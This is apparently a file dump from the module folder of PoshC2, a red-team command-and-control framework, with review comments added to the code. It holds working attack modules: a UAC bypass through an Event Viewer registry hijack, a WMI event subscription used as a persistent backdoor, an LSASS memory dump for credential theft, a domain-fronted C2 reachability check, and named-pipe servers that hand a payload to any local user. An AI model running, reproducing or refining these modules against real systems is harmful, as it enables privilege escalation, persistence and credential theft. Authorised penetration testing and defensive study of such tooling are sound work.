https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/InternalMonologue.exe -------------------------------------------------------------------------------- /resources/modules/Inveigh.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Inveigh.exe -------------------------------------------------------------------------------- /resources/modules/Invoke-EventVwrBypass.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-EventVwrBypass { 2 | <# 3 | .SYNOPSIS 4 | 5 | Bypasses UAC by performing an image hijack on the .msc file extension 6 | Expected to work on Win7, 8.1 and Win10 7 | 8 | Only tested on Windows 7 and Windows 10 9 | 10 | Author: 
Matt Nelson (@enigma0x3) 11 | License: BSD 3-Clause 12 | Required Dependencies: None 13 | Optional Dependencies: None 14 | 15 | .PARAMETER Command 16 | 17 | Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc " 18 | 19 | .EXAMPLE 20 | 21 | Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc 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" 22 | 23 | This will write out "Is Elevated: True" to C:\UACBypassTest. 24 | 25 | #> 26 | 27 | [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')] 28 | Param ( 29 | [Parameter(Mandatory = $True)] 30 | [ValidateNotNullOrEmpty()] 31 | [String] 32 | $Command, 33 | 34 | [Switch] 35 | $Force 36 | ) 37 | 38 | $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command" 39 | #Add in the new registry entries to hijack the msc file 40 | if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){ 41 | New-Item $mscCommandPath -Force | 42 | New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null 43 | }else{ 44 | Write-Verbose "Key already exists, consider using -Force" 45 | exit 46 | } 47 | 48 | if (Test-Path $mscCommandPath) { 49 | Write-Verbose "Created registry entries to hijack the msc extension" 50 | }else{ 51 | Write-Warning "Failed to create registry key, exiting" 52 | exit 53 | } 54 | 55 | 56 | $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe' 57 | 58 | #Start Event Viewer 59 | if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) { 60 | $Process = Start-Process -FilePath $EventvwrPath -PassThru 61 | Write-Verbose "Started eventvwr.exe" 62 | } 63 | 64 | #Sleep 5 seconds 65 | Write-Verbose "Sleeping 5 seconds to trigger payload" 66 | if (-not $PSBoundParameters['WhatIf']) { 67 | Start-Sleep -Seconds 5 68 | 
} 69 | 70 | $mscfilePath = "HKCU:\Software\Classes\mscfile" 71 | 72 | if (Test-Path $mscfilePath) { 73 | #Remove the registry entry 74 | Remove-Item $mscfilePath -Recurse -Force 75 | Write-Verbose "Removed registry entries" 76 | } 77 | 78 | if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){ 79 | Stop-Process -Id $Process.Id 80 | Write-Verbose "Killed running eventvwr process" 81 | } 82 | } 83 | -------------------------------------------------------------------------------- /resources/modules/Invoke-Sharp.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Execute Sharp Assembly in PowerhShell 4 | .DESCRIPTION 5 | Execute Sharp Assembly in PowerhShell 6 | .EXAMPLE 7 | PS C:\> Invoke-Sharp -asmName "ASMNAME" -asmArgs @("--listAll", "local", "\") 8 | .EXAMPLE 9 | PS C:\> Invoke-Sharp -asmName "ASMNAME" -asmArgs @("--addTask", "local", "09:30", "\", "TaskName", "Task Description", "C:\Windows\system32\cmd.exe", "/c calc.exe") 10 | #> 11 | function Invoke-Sharp { 12 | param ( 13 | [string]$asmName, 14 | [string[]]$asmArgs 15 | ) 16 | $sw = New-Object System.IO.StringWriter 17 | $originalOut = [Console]::Out 18 | try { 19 | [Console]::SetOut($sw) 20 | $asm = [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GetName().Name -eq $asmName } 21 | if ($asm -and $asm.EntryPoint) { 22 | echo "[+] Found Assembly" 23 | $asm.EntryPoint.Invoke($null, @(, $asmArgs)) 24 | } else { 25 | echo "[-] Assembly Not Found" 26 | } 27 | } finally { 28 | $sw.Flush() 29 | [Console]::SetOut($originalOut) 30 | } 31 | $output = $sw.ToString() 32 | $sw.Close() 33 | return $output 34 | } 35 | function List-Assemblies { 36 | [AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object { $_.FullName } 37 | } -------------------------------------------------------------------------------- /resources/modules/Invoke-SqlQuery.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | 
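<#
.SYNOPSIS
    Run a T-SQL query against a SQL Server instance and return the first result table.
.DESCRIPTION
    Executes -Query (default: SELECT @@version) through System.Data.SqlClient and emits the rows
    of the first result table. The connection string is either -ConnectionString verbatim or is
    assembled from -Sqlserver / -Catalog / -Database / -Username / -Password with a
    SqlConnectionStringBuilder, which quotes each value so that a server name, user name or
    password containing ';' or quotes cannot add or override connection keywords.
    Authentication: SQL authentication when both -Username and -Password are given, otherwise
    Integrated Security (the caller's current Windows token).
    NOTE(review): -Password is handled in clear text, and transport encryption / server
    certificate validation are left at the SqlClient defaults; nothing here sets Encrypt.
.PARAMETER ConnectionString
    Complete SqlClient connection string. When supplied, every other connection parameter is
    ignored. (The original accepted this parameter but never used it.)
.PARAMETER Sqlserver
    Data Source: host[\instance][,port].
.PARAMETER Username
    SQL login name. Used only together with -Password.
.PARAMETER Password
    SQL login password.
.PARAMETER Catalog
    Initial catalog (database); defaults to Master.
.PARAMETER Database
    Alias for -Catalog; when both are given, -Database wins. The original appended the bare
    value without a "Database=" keyword, which SqlClient rejects as an unsupported keyword.
.PARAMETER Query
    T-SQL text, sent as-is (no parameterisation: the operator is the author of the query).
.OUTPUTS
    System.Data.DataRow objects of the first result table; nothing when the query returns no
    result set.
.EXAMPLE
    Invoke-SqlQuery -Sqlserver 10.150.10.150 -Username sa -Password sa
#>
function Invoke-SqlQuery {

    param (
        [String]$ConnectionString,
        [String]$Sqlserver,
        [String]$Username,
        [String]$Password,
        [String]$Catalog,
        [String]$Database,
        [String]$Query
    )

    if (-not $Query) {
        $Query = 'SELECT @@version'
    }

    if ($ConnectionString) {
        $connString = $ConnectionString
    } else {
        $builder = New-Object System.Data.SqlClient.SqlConnectionStringBuilder
        $builder['Data Source'] = $Sqlserver

        $initialCatalog = 'Master'
        if ($Catalog)  { $initialCatalog = $Catalog }
        if ($Database) { $initialCatalog = $Database }
        $builder['Initial Catalog'] = $initialCatalog

        if ($Username -and $Password) {
            $builder['User Id']  = $Username
            $builder['Password'] = $Password
        } else {
            $builder['Integrated Security'] = $true
        }
        $connString = $builder.ConnectionString
    }

    $connection = New-Object System.Data.SqlClient.SqlConnection($connString)
    try {
        $command = $connection.CreateCommand()
        $command.CommandText = $Query
        $adapter = New-Object System.Data.SqlClient.SqlDataAdapter($command)
        $dataSet = New-Object System.Data.DataSet
        # Fill() returns the row count; the original let that integer leak onto the pipeline
        # ahead of the table.
        [void]$adapter.Fill($dataSet)
        # A statement without a result set leaves Tables empty; indexing [0] would throw.
        if ($dataSet.Tables.Count -gt 0) {
            $dataSet.Tables[0]
        }
    } finally {
        # SqlDataAdapter opens/closes the connection around Fill(); disposing returns the
        # pooled connection deterministically instead of waiting for garbage collection.
        $connection.Dispose()
    }

}

# ---- /resources/modules/Invoke-URLCheck.ps1 ----
<#
.SYNOPSIS
    Fetch each candidate C2 URL once to check which ones are reachable from this host.
.DESCRIPTION
    For every entry in -urls, builds a WebClient, sets the User-Agent/Referer headers (and a
    Host header of the matching -domainfront entry, for domain fronting), optionally routes it
    through -proxyurl with -username/-password, and GETs url + uri. Errors are written out via
    $error[0] rather than thrown, so every URL is attempted.
    Fixes against the original: the nested Test-Webclient reset $username, $password and
    $proxyurl to "" before reading them, so the proxy parameters never took effect; and the
    URL/front-host pairing used [array]::IndexOf, which returns the first index when the same
    URL appears twice.
    NOTE(review): the fixed "?lang=<GUID>" query string is a static fingerprint of this check;
    presumably it is matched server-side, so it is left unchanged here.
.PARAMETER urls
    Base URLs to test, e.g. https://host.
.PARAMETER domainfront
    Host header to send for the URL at the same index (empty/absent: no Host override).
.PARAMETER uri
    Path appended to each URL.
.PARAMETER proxyurl
    Explicit HTTP proxy; without it the system proxy with default credentials is used.
.PARAMETER username
    Proxy user name; only used together with -password.
.PARAMETER password
    Proxy password (clear text).
#>
function Invoke-URLCheck {
    Param (
        [Parameter(Mandatory = $true)]
        [array]$urls,
        [Parameter(Mandatory = $true)]
        [array]$domainfront,
        [Parameter(Mandatory = $true)]
        [string]$uri,
        [Parameter(Mandatory = $false)]
        [string]$proxyurl,
        [Parameter(Mandatory = $false)]
        [string]$username,
        [Parameter(Mandatory = $false)]
        [string]$password
    )

    function Test-Webclient() {
        # $username, $password and $proxyurl are read from the enclosing function's parameters;
        # the original overwrote them with "" here, which disabled the proxy options.
        $wc = New-Object System.Net.WebClient;

        if ($script:hostheader -and (($psversiontable.CLRVersion.Major -gt 2)))
        {
            # CLR 4+ allows the restricted Host header to be set directly.
            $wc.Headers.Add("Host",$script:hostheader)
        }
        elseif($script:hostheader)
        {
            # CLR 2 cannot set Host, so the request goes to the front host directly instead.
            $script:srv="https://$($script:hostheader)$uri";$script:sconnect="https://$($script:hostheader)"
        }

        $wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko")
        $wc.Headers.Add("Referer",$script:sconnect)

        if ($proxyurl)
        {
            $wp = New-Object System.Net.WebProxy($proxyurl,$true);
            if ($username -and $password)
            {
                $PSS = ConvertTo-SecureString $password -AsPlainText -Force;
                $getcreds = new-object system.management.automation.PSCredential $username,$PSS;
                $wp.Credentials = $getcreds;
            }
            else
            {
                # NOTE(review): this sets default credentials on the WebClient, not on $wp;
                # presumably $wp.UseDefaultCredentials was intended - kept as in the original.
                $wc.UseDefaultCredentials = $true;
            }
            $wc.Proxy = $wp;
        }
        else
        {
            $wc.UseDefaultCredentials = $true;
            $wc.Proxy.Credentials = $wc.Credentials;
        }
        $wc

    }

    function startprimer($url,$uri,$domainfront)
    {
        $script:srv=$url+$uri
        $script:sconnect=$url
        $script:hostheader=$domainfront
        (Test-Webclient).downloadstring($script:srv)
    }

    $uri = $uri+"?lang=1c400cee-081e-4898-977e-c984dcc1a8ba"

    # Index loop instead of [array]::IndexOf so duplicate URLs pair with their own front host.
    for ($i = 0; $i -lt $urls.Count; $i++)
    {
        try
        {
            startprimer $urls[$i] $uri $domainfront[$i]
        }
        catch
        {
            write-output $error[0]
        }
    }

}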
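<#
.Synopsis
    Invoke-WMIEvent
    https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
.DESCRIPTION
    Permanent WMI event subscription in root\subscription that runs -Command every day at
    -Hour:-Minute. Invoke-WMIEvent creates an __EventFilter, a CommandLineEventConsumer and
    the __FilterToConsumerBinding joining them, all named -Name; Remove-WMIEvent deletes the
    three by that name; Get-WMIEvent lists the CommandLineEventConsumers present.
    Usage: Invoke-WMIEvent -Name -Command -Hour -Minute
.EXAMPLE
    PS C:\> Get-WMIEvent
.EXAMPLE
    PS C:\> Invoke-WMIEvent -Name Backup -Command "powershell -enc abc" -Hour 10 -Minute 30
.EXAMPLE
    PS C:\> Remove-WMIEvent -Name Backup
#>
Function Invoke-WMIEvent
{
    <#
    .SYNOPSIS
        Create the filter, consumer and binding for a daily -Hour:-Minute trigger of -Command.
    .NOTES
        The filter polls Win32_LocalTime every 60 seconds (WITHIN 60) and fires when Hour and
        Minute match, so the command runs once per day, up to a minute late. -Hour/-Minute are
        typed [string] and interpolated straight into the WQL query. The three Set-WmiInstance
        calls are independent: if one fails the objects created before it are left behind and
        must be cleaned up with Remove-WMIEvent. The binding object returned by the last call is
        emitted to the pipeline. NOTE(review): writing to root\subscription normally requires
        local administrator rights; nothing here checks for them.
    #>
    Param
    (
        [Parameter(Mandatory=$true)][string]
        $Name,
        [Parameter(Mandatory=$true)][string]
        $Command,
        [string]
        $Hour=9,
        [string]
        $Minute=30
    )

    $namespace = "root\subscription"
    $wql = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $Hour AND TargetInstance.Minute = $Minute GROUP WITHIN 60"

    $Filter = Set-WmiInstance -Class __EventFilter -Namespace $namespace -Arguments @{
        name           = "$Name"
        EventNameSpace = 'root\CimV2'
        QueryLanguage  = "WQL"
        Query          = $wql
    }

    $Consumer = Set-WmiInstance -Namespace $namespace -Class 'CommandLineEventConsumer' -Arguments @{
        name                = "$Name"
        CommandLineTemplate = "$Command"
        RunInteractively    = 'false'
    }

    Set-WmiInstance -Namespace $namespace -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter; Consumer = $Consumer }

    Write-Output ""
    Write-Output "[+] WMIEvent added: $Name for $Hour : $Minute"
    Write-Output "[+] Command: $Command"
    Write-Output ""
}

Function Remove-WMIEvent
{
    <#
    .SYNOPSIS
        Delete the binding, consumer and filter that Invoke-WMIEvent created under -Name.
    .NOTES
        The binding is removed first so that nothing is left referencing a deleted filter or
        consumer if a later step fails. The binding is located by its Consumer reference, an
        object path of the form CommandLineEventConsumer.Name="<name>"; the original matched it
        with -like "*$Name*", which also removed the bindings of any other consumer whose name
        merely contained -Name (e.g. "Backup" matched "BackupSvc").
    #>
    Param
    (
        [Parameter(Mandatory=$true)][string]
        $Name
    )

    $namespace = "root\subscription"

    Write-Output ""
    Write-Output "[*] Removing __FilterToConsumerBinding"
    Get-WmiObject __FilterToConsumerBinding -Namespace $namespace |
        Where-Object { $_.Consumer -like "*CommandLineEventConsumer.Name=`"$Name`"*" } |
        Remove-WmiObject
    Write-Output "[*] Removing CommandLineEventConsumer"
    Get-WmiObject CommandLineEventConsumer -Namespace $namespace -Filter "name='$Name'" | Remove-WmiObject
    Write-Output "[*] Removing __EventFilter"
    Get-WmiObject __EventFilter -Namespace $namespace -Filter "name='$Name'" | Remove-WmiObject
    Write-Output ""
    Write-Output "[+] WMIEvent removed: $Name"
    Write-Output ""
}

Function Get-WMIEvent
{
    <#
    .SYNOPSIS
        List every CommandLineEventConsumer in root\subscription. Only the consumer half of each
        subscription is shown; filters and bindings are not listed.
    #>
    gwmi CommandLineEventConsumer -Namespace root\subscription
}

# ---- /resources/modules/Invoke-WinRMSession.ps1 ----
Function Get-RandomName
{
    <#
    .SYNOPSIS
        Return -Length random lowercase ASCII letters (empty string for Length <= 0).
    .NOTES
        Uses Get-Random, which is not a cryptographic RNG; adequate here because the result is
        only used as a variable name.
    #>
    param (
        [int]$Length
    )
    $alphabet = 'abcdefghijklmnopqrstuvwxyz'.ToCharArray()
    $name = ''
    for ($i = 0; $i -lt $Length; $i++) {
        $name += $alphabet | Get-Random
    }
    return $name
}

Function Invoke-WinRMSession {
    <#
    .SYNOPSIS
        Open a PSSession to -IPAddress with the given credentials, store it in a randomly named
        global variable and return the Invoke-Command line that uses it.
    .DESCRIPTION
        Fix against the original: New-PSSession failures are non-terminating, so a bad password
        or unreachable host stored $null in the variable and the function still reported
        "Session opened". -ErrorAction Stop makes the failure surface to the caller instead.
        NOTE(review): -Password is taken in clear text; the session variable is global and
        outlives this call until the runspace ends or the variable is removed.
    #>
    param (
        $username,
        $Password,
        $IPAddress
    )
    $securePassword = ConvertTo-SecureString $Password -AsPlainText -Force
    $credential = New-Object System.Management.Automation.PSCredential($username, $securePassword)

    $session = New-PSSession -ComputerName $IPAddress -Credential $credential -ErrorAction Stop

    $variableName = Get-RandomName 5
    New-Variable -Name $variableName -Scope Global -Value $session
    Return "`nSession opened, to run a command do the following:`nInvoke-Command -Session `$$variableName -scriptblock {Get-Process} | out-string"

}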
# ---- /resources/modules/MiniDump.ps1 ----
# Write a full-memory minidump (dumpType 2 = MiniDumpWithFullMemory) of a process - LSASS by
# default - to %SystemRoot%\Temp\debug.bin via dbghelp!MiniDumpWriteDump, and echo a status line.
# The C# below is compiled with Add-Type on every call; the PowerShell wrapper always calls
# Minidump() with the default pid (-1), i.e. the first process named "lsass".
# Behaviour visible in the C#:
#   - if no process named "lsass" exists, processes[0] throws IndexOutOfRangeException, which is
#     not caught and surfaces as a .NET exception rather than an "[X]" string;
#   - the dump file has a fixed name, is overwritten (FileMode.Create), is opened with
#     FileShare.Write, and is never removed by this script - it holds credential material and
#     must be cleaned up by the operator;
#   - on failure only "[X] Dump failed: False" is returned; the Win32 error that SetLastError=true
#     makes available (Marshal.GetLastWin32Error) is never read.
# NOTE(review): a second call in the same runspace presumably fails at Add-Type because type
# MDump already exists - confirm.
# NOTE(review): opening a handle to lsass and calling MiniDumpWriteDump are commonly monitored
# operations; nothing here adapts to that.

Function MiniDump {
$MiniDump = @"
using System.Security.Principal;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System;

public class MDump {

    [DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)]
    public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle hFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam);

    public static string Minidump(int pid = -1)
    {

        IntPtr targetProcessHandle = IntPtr.Zero;
        uint targetProcessId = 0;

        Process targetProcess = null;
        if (pid == -1)
        {
            Process[] processes = Process.GetProcessesByName("lsass");
            targetProcess = processes[0];
        }
        else
        {
            try
            {
                targetProcess = Process.GetProcessById(pid);
            }
            catch (Exception ex)
            {
                return String.Format("[X]Exception: {0}", ex.Message);
            }
        }

        try
        {
            targetProcessId = (uint)targetProcess.Id;
            targetProcessHandle = targetProcess.Handle;
        }
        catch (Exception ex)
        {
            return String.Format("[X] Error getting handle to {0} ({1}): {2}", targetProcess.ProcessName, targetProcess.Id, ex.Message);
        }
        bool bRet = false;

        string systemRoot = Environment.GetEnvironmentVariable("SystemRoot");
        string dumpFile = String.Format("{0}\\Temp\\debug.bin", systemRoot);

        using (FileStream fs = new FileStream(dumpFile, FileMode.Create, FileAccess.ReadWrite, FileShare.Write))
        {
            bRet = MiniDumpWriteDump(targetProcessHandle, targetProcessId, fs.SafeFileHandle, (uint)2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
        }
        if (bRet)
        {
            return "[+] Dump successful - " + dumpFile;
        }
        else
        {
            return String.Format("[X] Dump failed: {0}", bRet);
        }
    }

}
"@
# Compile MDump into the current AppDomain (no caching: recompiled on each call).
Add-Type $MiniDump
# No pid is passed, so the C# side falls back to the first "lsass" process.
$ptr = [MDump]::Minidump()
echo $ptr
}

# ---- /resources/modules/NamedPipe.ps1 ----
# Serve $payload over the local named pipe "PoshMS" from a background runspace. Every client that
# connects receives the payload as one line and is disconnected; the loop then creates a fresh
# pipe instance and waits again, forever. $payload is expected to exist in the calling scope.
# NOTE(review): the pipe ACL grants Everyone ReadWrite, so any local principal that can open
# \\.\pipe\PoshMS receives the payload; nothing authenticates the client.
# NOTE(review): the runspace pool and the async job are never closed/disposed, so the server
# thread lives as long as the hosting process.
$scriptblock =
{
    param ($Payload)
    $PipeName = "PoshMS"
    # Start only if no pipe whose name ends in "PoshMS" is already present (-like is an
    # ends-with match, so any foreign pipe with that suffix also suppresses the server).
    $p = [System.IO.Directory]::GetFiles("\\.\\pipe\\")
    $start = $true
    foreach ($i in $p) {
        if ($i -like "*PoshMS") {
            $start = $false
        }
    }
    while ($start) {
        add-Type -assembly "System.Core"
        $PipeSecurity = New-Object System.IO.Pipes.PipeSecurity
        # Everyone:ReadWrite - see the review note above.
        $AccessRule = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
        $PipeSecurity.AddAccessRule($AccessRule)
        # Up to 100 server instances, byte mode, 1024-byte in/out buffers.
        $Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName,"InOut",100, "Byte", "None", 1024, 1024, $PipeSecurity)
        $pipe.WaitForConnection();

        # The reader is created but never read from; it is only disposed below (which also
        # closes the underlying pipe).
        $pipeReader = new-object System.IO.StreamReader($pipe)
        $pipeWriter = new-object System.IO.StreamWriter($pipe)
        $pipeWriter.AutoFlush = $true
        $pipeWriter.WriteLine($Payload);

        $pipeReader.Dispose();
        $pipe.Dispose();
    }
    # Reached only when a matching pipe already existed at start-up.
    exit
}
add-Type -assembly "System.Core"

$MaxThreads = 5
$RunspacePool = [RunspaceFactory]::CreateRunspacePool(1, $MaxThreads)
$RunspacePool.Open()
# $Jobs is never used.
$Jobs = @()
$Job = [powershell]::Create().AddScript($ScriptBlock).AddArgument($payload)
$Job.RunspacePool = $RunspacePool
$Job.BeginInvoke() | Out-Null

# Client-side handle to the same pipe; constructed but not connected here - presumably left for
# the caller's use.
$pi = new-object System.IO.Pipes.NamedPipeClientStream(".", "PoshMS");


# ---- /resources/modules/NamedPipeDaisy.ps1 ----
# Same server as NamedPipe.ps1, but on pipe "PoshMSDaisy" serving $daisypayload (expected in
# the calling scope). The Everyone:ReadWrite ACL and the never-disposed runspace pool apply
# here too.
$scriptblock =
{
    param ($Payload)
    $PipeName = "PoshMSDaisy"
    # Start only if no pipe whose name ends in "PoshMSDaisy" already exists.
    $p = [System.IO.Directory]::GetFiles("\\.\\pipe\\")
    $start = $true
    foreach ($i in $p) {
        if ($i -like "*PoshMSDaisy") {
            $start = $false
        }
    }
    while ($start) {
        add-Type -assembly "System.Core"
        $PipeSecurity = New-Object System.IO.Pipes.PipeSecurity
        # Everyone:ReadWrite - any local principal can connect and receive the payload.
        $AccessRule = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
        $PipeSecurity.AddAccessRule($AccessRule)
        $Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName,"InOut",100, "Byte", "None", 1024, 1024, $PipeSecurity)
        $pipe.WaitForConnection();

        $pipeReader = new-object System.IO.StreamReader($pipe)
        $pipeWriter = new-object System.IO.StreamWriter($pipe)
        $pipeWriter.AutoFlush = $true
        $pipeWriter.WriteLine($Payload);

        $pipeReader.Dispose();
        $pipe.Dispose();
    }
    exit
}
add-Type -assembly "System.Core"

$MaxThreads = 5
$RunspacePool = [RunspaceFactory]::CreateRunspacePool(1, $MaxThreads)
$RunspacePool.Open()
# $Jobs is never used.
$Jobs = @()
$Job = [powershell]::Create().AddScript($ScriptBlock).AddArgument($daisypayload)
$Job.RunspacePool = $RunspacePool
$Job.BeginInvoke() | Out-Null

# Client-side handle, constructed but not connected here.
$pi = new-object System.IO.Pipes.NamedPipeClientStream(".", "PoshMSDaisy");


# ---- /resources/modules/NamedPipeProxy.ps1 ----
# Serve $proxypayload over the local named pipe "PoshMSProxy" from a background runspace.
# Each client that connects receives the payload as a single line and is then disconnected;
# the server loops forever, one pipe instance per connection, unless a pipe whose name ends
# in "PoshMSProxy" already existed when this script started. $proxypayload must be defined
# in the calling scope.
# NOTE(review): the pipe ACL grants Everyone ReadWrite, so any local account that can open
# \\.\pipe\PoshMSProxy receives the payload; nothing authenticates the client.
$scriptblock =
{
    param ($Payload)

    $pipeName = "PoshMSProxy"

    # Do not start a second server if an instance already appears to be listening.
    $alreadyListening = $false
    foreach ($existing in [System.IO.Directory]::GetFiles("\\.\\pipe\\")) {
        if ($existing -like "*PoshMSProxy") {
            $alreadyListening = $true
        }
    }
    $keepServing = -not $alreadyListening

    while ($keepServing) {
        add-Type -assembly "System.Core"
        $acl = New-Object System.IO.Pipes.PipeSecurity
        $acl.AddAccessRule((New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )))
        # Up to 100 instances, byte mode, 1024-byte in/out buffers.
        $server = New-Object System.IO.Pipes.NamedPipeServerStream($pipeName,"InOut",100, "Byte", "None", 1024, 1024, $acl)
        $server.WaitForConnection();

        $reader = new-object System.IO.StreamReader($server)
        $writer = new-object System.IO.StreamWriter($server)
        $writer.AutoFlush = $true
        $writer.WriteLine($Payload);

        # Disposing the reader closes the underlying pipe; the explicit Dispose afterwards is harmless.
        $reader.Dispose();
        $server.Dispose();
    }
    exit
}
add-Type -assembly "System.Core"

$MaxThreads = 5
$RunspacePool = [RunspaceFactory]::CreateRunspacePool(1, $MaxThreads)
$RunspacePool.Open()
$Jobs = @()
$Job = [powershell]::Create().AddScript($ScriptBlock).AddArgument($proxypayload)
$Job.RunspacePool = $RunspacePool
$Job.BeginInvoke() | Out-Null

# Client-side handle to the same pipe; constructed but not connected here - presumably left
# for the caller's use.
$pi = new-object System.IO.Pipes.NamedPipeClientStream(".", "PoshMSProxy");
-------------------------------------------------------------------------------- /resources/modules/OFs/adcs_enum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adcs_enum.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/adcs_enum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adcs_enum.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/adcs_enum_com.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adcs_enum_com.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/adcs_enum_com.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adcs_enum_com.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/adcs_enum_com2.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adcs_enum_com2.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/adcs_enum_com2.x86.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adcs_enum_com2.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/adv_audit_policies.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adv_audit_policies.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/adv_audit_policies.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adv_audit_policies.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/arp.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/arp.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/arp.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/arp.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/cacls.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/cacls.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/cacls.x86.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/cacls.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/demo_bof.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/demo_bof.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/demo_bof.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/demo_bof.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/dir.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/dir.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/dir.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/dir.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/driversigs.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/driversigs.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/driversigs.x86.o: -------------------------------------------------------------------------------- 
